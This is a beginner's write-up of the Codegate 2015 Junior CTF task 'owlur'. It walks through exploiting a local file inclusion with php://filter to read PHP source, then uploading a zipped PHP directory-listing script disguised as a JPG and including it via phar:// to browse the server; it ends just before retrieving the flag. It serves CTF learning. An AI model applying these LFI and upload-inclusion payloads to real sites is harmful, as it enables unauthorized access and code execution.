Codegate CTF Junior Preliminary 2015 - Task owlur

I am a newbie at CTFs so there will be many errors in this writeup. If you found one (or some), please leave a comment or send me an e-mail :D. Thank you :D

On the main page we see an upload form, so we can guess that this site has a Local File Inclusion vulnerability somewhere.

Try to load some pages:

http://54.65.205.135/owlur/index.php?page=view&id=random

http://54.65.205.135/owlur/index.php?page=upload

http://54.65.205.135/owlur/index.php?page=./index

We can modify this GET parameter to include other files from the server, and we can also assume that the site will append a ".php" extension after the file name. You can get the PHP source codes of those page using the PHP filter protocol (PHP: php:// - Manual):

http://54.65.205.135/owlur/index.php?page=php://filter/convert.base64-encode/resource=view

http://54.65.205.135/owlur/index.php?page=php://filter/convert.base64-encode/resource=upload

We got the base64-encoded sources of these files. Decode them and we'll get the original codes:

view.php:

<?php
$pic = $_REQUEST['id'];

if($pic == "" || $pic == "random")
{
$picname = "preloaded-owls/" . rand(1,14) . ".jpg";
}

else $picname = "/owl/" . $pic . ".jpg";



echo '<img src="' . $picname . '">';

?>

upload.php:

<?php

function RandomString()
{
    $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $randstring = "";
    for ($i = 0; $i < 7; $i++) {
        $randstring .= $characters[rand(0, strlen($characters)-1)];
    }
    return $randstring;
}

$target_dir = "/var/www/owlur/owlur-upload-zzzzzz/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 0;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
$fsize = $_FILES['fileToUpload']['size'];
$newid = RandomString();
$newname = $newid . ".jpg";

if(isset($_POST["submit"])) {
    if($imageFileType == "jpg") {
        $uploadOk = 1;
    } else {
    echo "<p>Sorry, only JPG images of owls will be accepted. Please use a different service if you do not intend to upload owl pictures.</p>";
        $uploadOk = 0;
    }

    if(!($fsize >= 0 && $fsize <= 200000)) {
    $uploadOk = 0;
        echo "<p>Sorry, the size of your owl picture is not to our liking.</p>";
    }

}

if($uploadOk)
{

$newpath = "/var/www/owlur/owlur-upload-zzzzzz/" . $newname;

if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $newpath)) {
    header('Location: /owlur/index.php?page=view&id=' . $newid);
    } else {
        echo "<p>Sorry, there was an error uploading your file.</p>";
    }

}


?>

So our uploaded images will be stored at http://54.65.205.135/owlur/owlur-upload-zzzzzz/ with a random name and a .jpg extension. And, our uploaded file must end with the .jpg extension, otherwise it will be rejected.

I tried to include my files with the null byte trick but it didn't work, so we'll need some other ways to keep our .php extension with our uploaded file. We can do that with the phar:// protocol (PHP: phar:// - Manual):

First, we need to see which files are there on the server. I used the following script:

<?php
$pic = $_REQUEST['id'];
print_r(scandir($pic));
?>s

Save it as "execute.php". After that I compress it as a ZIP archive, change its name to "execute.jpg" and upload it on the site. Then I include the PHP file inside the archive that I uploaded:

http://54.65.205.135/owlur/index.php?page=phar://./owlur-upload-zzzzzz/9RLN4ro.jpg/execute&id=/var/www/owlur/

We can see that there are some folders, but I couldn't find anything interesting (well maybe there are some), so I tried to look a little bit broader:

http://54.65.205.135/owlur/index.php?page=phar://./owlur-upload-zzzzzz/9RLN4ro.jpg/execute&id=/

I found an interesting file named "OWLUR-FLAG.txt". Because there is a filter that won't allow ".." so I wrote another script to retrieve this file: